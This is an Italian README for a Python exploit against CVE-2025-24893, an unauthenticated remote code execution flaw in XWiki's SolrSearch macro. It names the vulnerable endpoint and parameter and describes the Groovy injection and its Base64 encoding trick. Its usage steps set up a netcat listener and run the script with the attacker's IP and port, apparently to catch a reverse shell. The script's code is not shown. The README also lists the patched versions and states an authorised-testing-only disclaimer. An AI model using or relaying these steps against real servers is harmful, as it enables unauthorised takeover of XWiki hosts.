
Exploit di Esecuzione Remota di Codice (RCE) in XWiki
Exploit di Esecuzione Remota di Codice (RCE) su XWiki
Uno script in Python3 per la CVE-2025-24893, una vulnerabilità critica di Esecuzione Remota di Codice Non Autenticata (RCE) che affligge la piattaforma XWiki.
Questo script sfrutta una falla di Iniezione di Codice/Espressione (CWE-95) all'interno del componente della macro SolrSearch. La falla consente agli attaccanti di eseguire codice Groovy/Java arbitrario sul sistema operativo sottostante. L'exploit esegue automaticamente la codifica in Base64 per bypassare le limitazioni di interpretazione dei comandi della funzione Runtime.getRuntime().exec() di Java.
/bin/get/Main/SolrSearch (tramite il parametro text)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_BERSAGLIO> <IL_TUO_IP_VPN> <LA_TUA_PORTA>
Esempio:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requestsPer installare la dipendenza necessaria:
pip install requests
Aggiorna la tua istanza di XWiki a una delle versioni ufficiali corrette: 15.10.11, 16.4.1, 16.5.0-rc-1 (o successive).
Questo script è stato sviluppato esclusivamente per scopi educativi, audit di sicurezza autorizzati e test di penetrazione (Pentest). L'autore non si assume alcuna responsabilità per usi impropri, danni o attività illegali causate da questo strumento. L'utilizzo di questo script contro bersagli senza preventiva autorizzazione è strettamente illegale.